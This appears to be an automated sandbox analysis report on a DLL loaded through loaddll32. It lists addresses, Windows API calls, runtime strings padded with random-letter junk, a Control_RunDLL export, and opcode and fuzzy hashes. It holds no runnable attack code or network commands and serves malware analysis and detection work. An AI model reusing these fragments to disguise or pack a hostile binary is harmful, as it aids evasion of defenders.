                                                                                                                                                                                      0x6e9ef91e
                                                                                                                                                                                      0x6e9ef921
                                                                                                                                                                                      0x6e9ef923
                                                                                                                                                                                      0x6e9ef924
                                                                                                                                                                                      0x6e9ef929
                                                                                                                                                                                      0x6e9ef92c
                                                                                                                                                                                      0x6e9ef92e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef930
                                                                                                                                                                                      0x6e9ef931
                                                                                                                                                                                      0x6e9ef934
                                                                                                                                                                                      0x6e9ef936
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef938
                                                                                                                                                                                      0x6e9ef938
                                                                                                                                                                                      0x6e9ef93b
                                                                                                                                                                                      0x6e9ef93e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef93e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef936
                                                                                                                                                                                      0x6e9ef952
                                                                                                                                                                                      0x6e9ef958
                                                                                                                                                                                      0x6e9ef975
                                                                                                                                                                                      0x6e9ef97a
                                                                                                                                                                                      0x6e9ef97a
                                                                                                                                                                                      0x6e9ef97d
                                                                                                                                                                                      0x6e9ef97d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef941
                                                                                                                                                                                      0x6e9ef941
                                                                                                                                                                                      0x6e9ef942
                                                                                                                                                                                      0x6e9ef945
                                                                                                                                                                                      0x6e9ef948
                                                                                                                                                                                      0x6e9ef94b
                                                                                                                                                                                      0x6e9ef94b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef950
                                                                                                                                                                                      0x6e9ef8ec
                                                                                                                                                                                      0x6e9ef8de
                                                                                                                                                                                      0x6e9ef980
                                                                                                                                                                                      0x6e9ef983
                                                                                                                                                                                      0x6e9ef984
                                                                                                                                                                                      0x6e9ef987
                                                                                                                                                                                      0x6e9ef98a
                                                                                                                                                                                      0x6e9ef98d
                                                                                                                                                                                      0x6e9ef990
                                                                                                                                                                                      0x6e9ef990
                                                                                                                                                                                      0x6e9ef999
                                                                                                                                                                                      0x6e9ef99c
                                                                                                                                                                                      0x6e9ef99c
                                                                                                                                                                                      0x6e9ef8b4
                                                                                                                                                                                      0x6e9ef99f
                                                                                                                                                                                      0x6e9ef9a3
                                                                                                                                                                                      0x6e9ef9a5
                                                                                                                                                                                      0x6e9ef9a8
                                                                                                                                                                                      0x6e9ef9ae
                                                                                                                                                                                      0x6e9ef9ae
                                                                                                                                                                                      0x6e9ef9b6
                                                                                                                                                                                      0x6e9ef9bb
                                                                                                                                                                                      0x6e9efa29
                                                                                                                                                                                      0x6e9efa29
                                                                                                                                                                                      0x6e9efa2e
                                                                                                                                                                                      0x6e9efa32
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9bd
                                                                                                                                                                                      0x6e9ef9bd
                                                                                                                                                                                      0x6e9ef9c1
                                                                                                                                                                                      0x6e9ef9d3
                                                                                                                                                                                      0x6e9ef9d6
                                                                                                                                                                                      0x6e9ef9d9
                                                                                                                                                                                      0x6e9ef9db
                                                                                                                                                                                      0x6e9ef9f2
                                                                                                                                                                                      0x6e9ef9f6
                                                                                                                                                                                      0x6e9ef9fc
                                                                                                                                                                                      0x6e9ef9fd
                                                                                                                                                                                      0x6e9ef9ff
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa01
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa01
                                                                                                                                                                                      0x6e9ef9dd
                                                                                                                                                                                      0x6e9ef9e2
                                                                                                                                                                                      0x6e9ef9e5
                                                                                                                                                                                      0x6e9ef9ea
                                                                                                                                                                                      0x6e9ef9ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9ed
                                                                                                                                                                                      0x6e9ef9c3
                                                                                                                                                                                      0x6e9ef9c6
                                                                                                                                                                                      0x6e9ef9c9
                                                                                                                                                                                      0x6e9ef9cb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9cd
                                                                                                                                                                                      0x6e9ef9cd
                                                                                                                                                                                      0x6e9ef9d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9d1
                                                                                                                                                                                      0x6e9ef9cb
                                                                                                                                                                                      0x6e9ef9c1
                                                                                                                                                                                      0x6e9ef86b
                                                                                                                                                                                      0x6e9ef86b
                                                                                                                                                                                      0x6e9ef872
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef874
                                                                                                                                                                                      0x6e9ef874
                                                                                                                                                                                      0x6e9ef87b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef87b
                                                                                                                                                                                      0x6e9ef872
                                                                                                                                                                                      0x6e9ef869
                                                                                                                                                                                      0x6e9ef85c
                                                                                                                                                                                      0x6e9ef7dc
                                                                                                                                                                                      0x6e9ef7e4
                                                                                                                                                                                      0x6e9ef7e7
                                                                                                                                                                                      0x6e9ef7ec
                                                                                                                                                                                      0x6e9ef7f0
                                                                                                                                                                                      0x6e9ef7f3
                                                                                                                                                                                      0x6e9ef7f9
                                                                                                                                                                                      0x6e9ef7fc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef7fe
                                                                                                                                                                                      0x6e9ef7fe
                                                                                                                                                                                      0x6e9ef801
                                                                                                                                                                                      0x6e9ef803
                                                                                                                                                                                      0x6e9efa39
                                                                                                                                                                                      0x6e9efa39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef809
                                                                                                                                                                                      0x6e9ef811
                                                                                                                                                                                      0x6e9ef81c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef825
                                                                                                                                                                                      0x6e9ef828
                                                                                                                                                                                      0x6e9ef829
                                                                                                                                                                                      0x6e9ef82c
                                                                                                                                                                                      0x6e9ef82e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef834
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef834
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef82e
                                                                                                                                                                                      0x6e9ef809
                                                                                                                                                                                      0x6e9efa3e
                                                                                                                                                                                      0x6e9efa3e
                                                                                                                                                                                      0x6e9efa40
                                                                                                                                                                                      0x6e9efa41
                                                                                                                                                                                      0x6e9efa48
                                                                                                                                                                                      0x6e9efa4b
                                                                                                                                                                                      0x6e9efa59
                                                                                                                                                                                      0x6e9efa5e
                                                                                                                                                                                      0x6e9efa63
                                                                                                                                                                                      0x6e9efa66
                                                                                                                                                                                      0x6e9efa6b
                                                                                                                                                                                      0x6e9efa6e
                                                                                                                                                                                      0x6e9efa71
                                                                                                                                                                                      0x6e9efa73
                                                                                                                                                                                      0x6e9efa75
                                                                                                                                                                                      0x6e9efa75
                                                                                                                                                                                      0x6e9efa7a
                                                                                                                                                                                      0x6e9efa86
                                                                                                                                                                                      0x6e9efa8c
                                                                                                                                                                                      0x6e9efa91
                                                                                                                                                                                      0x6e9efa94
                                                                                                                                                                                      0x6e9efa95
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa95
                                                                                                                                                                                      0x6e9ef7fc
                                                                                                                                                                                      0x6e9ef7da
                                                                                                                                                                                      0x6e9ef79a
                                                                                                                                                                                      0x6e9ef77b
                                                                                                                                                                                      0x6e9ef76d
                                                                                                                                                                                      0x6e9ef739

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EF7F3
                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 6E9EF815
                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6E9EF924
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EF9F6
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 6E9EFA7A
                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 6E9EFA95
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                      • Opcode ID: 224304857fea044cb346da4869edda7463c7927c1ab1c2f631513e20da6a6daf
                                                                                                                                                                                      • Instruction ID: 7086f57a778fc3f75746f0911c1b5e5ef5c7d70de86fbe033270a245ce6e4ddd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 224304857fea044cb346da4869edda7463c7927c1ab1c2f631513e20da6a6daf
                                                                                                                                                                                      • Instruction Fuzzy Hash: B3B18E3180020AEFCF16CFE4E8909DEB7B9BF58318B24455BEA116BA15E331D952CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC37A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC387
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC3CA
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC3D7
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC40A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC417
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC44A
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC457
                                                                                                                                                                                      • TlsGetValue.KERNEL32(?), ref: 6E9DC48B
                                                                                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 6E9DC498
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Value
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                                      • Opcode ID: ed068c759289e73b8e45b766af98ef6906951867c61e35210c187d3a01ae68e1
                                                                                                                                                                                      • Instruction ID: 6be7469f04033a563f406cba0ecdea17030a0a68f134b4f894864231c5b6def4
                                                                                                                                                                                      • Opcode Fuzzy Hash: ed068c759289e73b8e45b766af98ef6906951867c61e35210c187d3a01ae68e1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F419271184A69AFDB526FE4AD10BFA3718EF13781F04C020FE145E251E7B1DA19AF92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6E9E1A7E,?), ref: 6E9E1C05
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6E9E1A7E,?), ref: 6E9E1C16
                                                                                                                                                                                      • GetConsoleMode.KERNEL32(00000000,?), ref: 6E9E1C58
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E9E1CD3
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 6E9E1D55
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6E9E1E5E
                                                                                                                                                                                      • Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6E9E1E45
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$ConsoleFileHandleModeWrite
                                                                                                                                                                                      • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
                                                                                                                                                                                      • API String ID: 4172320683-1866377508
                                                                                                                                                                                      • Opcode ID: 8a24d72ec900fb36f02dd8b532213fecc73d8eda8fd8d938d8928261c67d1854
                                                                                                                                                                                      • Instruction ID: f34a5307f6bda91a3881232f98956c422ad7162fc3965adfc9c16185d887b2f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a24d72ec900fb36f02dd8b532213fecc73d8eda8fd8d938d8928261c67d1854
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F71CCB06087019FD3158FA6D49576B7BE9AF96308F04882DE5DA87780E771D88C8F12
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC509
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC553
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DC562
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,00000020), ref: 6E9DC575
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E108), ref: 6E9DC5C7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • called `Option::unwrap()` on a `None` value, xrefs: 6E9DC5F7
                                                                                                                                                                                      • failed to generate unique thread ID: bitspace exhausted, xrefs: 6E9DC5D4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                                                                                                                                                                                      • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                                                                                                                                                                                      • API String ID: 1780889587-1657987152
                                                                                                                                                                                      • Opcode ID: 8dce7fb8ef4235230363752a3abe16aa681b2fa9a120c0e68e4116c8e854619c
                                                                                                                                                                                      • Instruction ID: 4c6e9a496041166d57a54fef8cd9fb65b11c7d670d9da38024e1b78958b3641c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dce7fb8ef4235230363752a3abe16aa681b2fa9a120c0e68e4116c8e854619c
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF31DEB49046158FEB008FE4D8087AD7BB8EF99324F188129D415AF390D7749989CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9D10D6
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,0000000F), ref: 6E9D10ED
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00720000,00000000,0000000F), ref: 6E9D111F
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,00000010,00720000,00000000,0000000F), ref: 6E9D1136
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000010,00720000,00000000,0000000F), ref: 6E9D120B
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000010,00720000,00000000,0000000F), ref: 6E9D121B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocFreeProcess
                                                                                                                                                                                      • String ID: Control_RunDLL$Control_RunDLL
                                                                                                                                                                                      • API String ID: 2113670309-2490747307
                                                                                                                                                                                      • Opcode ID: 78b95e32d6d59a58c86e75d71d2a16fc1c235b476bb369ce7613fb3b66ac8dcb
                                                                                                                                                                                      • Instruction ID: 344404a78bbd0775cd307bf01330f6882ae3a57adc0f410e1b4e99e6136a4fe0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 78b95e32d6d59a58c86e75d71d2a16fc1c235b476bb369ce7613fb3b66ac8dcb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19518B75D00B299BDB01CFE5C840BEEBBB9EF9A304F108529E9147B640D771A845CFA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EEF57
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 6E9EEF5F
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EEFE8
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 6E9EF013
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 6E9EF068
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: bd2440c7599199bd4768a60fb338d50315030edeaf74400ceccafb2033756743
                                                                                                                                                                                      • Instruction ID: 1ffdaa79a08766bf05e75fa7e2baaf0c01b37cc997c0d0faa847d9699db46372
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd2440c7599199bd4768a60fb338d50315030edeaf74400ceccafb2033756743
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D41B334A10209DFCF01CFA8C880ADEBBB9BF45328F148865E914AB795D731D946CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6EA2E114), ref: 6E9E2994
                                                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 6E9E29AA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9E29C4
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,0000000C), ref: 6E9E29DB
                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6EA2E114), ref: 6E9E2A18
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6E9E2A38
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                                                                                                                                                                                      • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
                                                                                                                                                                                      • API String ID: 3228198226-3009553730
                                                                                                                                                                                      • Opcode ID: 57ba07781c639c29bbd23c91fcf74f6d967c1bc9f46c75724240da4a50381283
                                                                                                                                                                                      • Instruction ID: d909d689bfa5c90a62ad57087daa01989322c0db103c0c03be96dddfea4a26fa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 57ba07781c639c29bbd23c91fcf74f6d967c1bc9f46c75724240da4a50381283
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E4157B190034A8FDB11CFE4D855BAEBBB4FF45318F148129D619AB780DB749885CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,6E9F43C9,FFFDC801,00000400,?,00000000,00000001,?,6E9F4542,00000021,FlsSetValue,6EA26BF8,6EA26C00,?), ref: 6E9F437D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                                                                      • Opcode ID: 0555316ccff2f83fbf21c3eb394363c3463911088ed98a9768460ae91c7d9665
                                                                                                                                                                                      • Instruction ID: 28a487c21a6ba24e86f33e6c44d2c3607a7d631ffe92a4e6023aa077f2d1f3dc
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0555316ccff2f83fbf21c3eb394363c3463911088ed98a9768460ae91c7d9665
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0210876A45611EFDB119BA5DE40E8A376CAF43364F194520ED15BB280DB70E903CFD0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(00000001,?,6E9EF101,6E9ECFA2,6E9EC7AC,?,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8,0000000C,6E9ECADD), ref: 6E9EF3CD
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9EF3DB
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9EF3F4
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,6E9EC9E4,?,00000001,?,?,00000001,?,6EA2AFA8,0000000C,6E9ECADD,?,00000001,?), ref: 6E9EF446
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
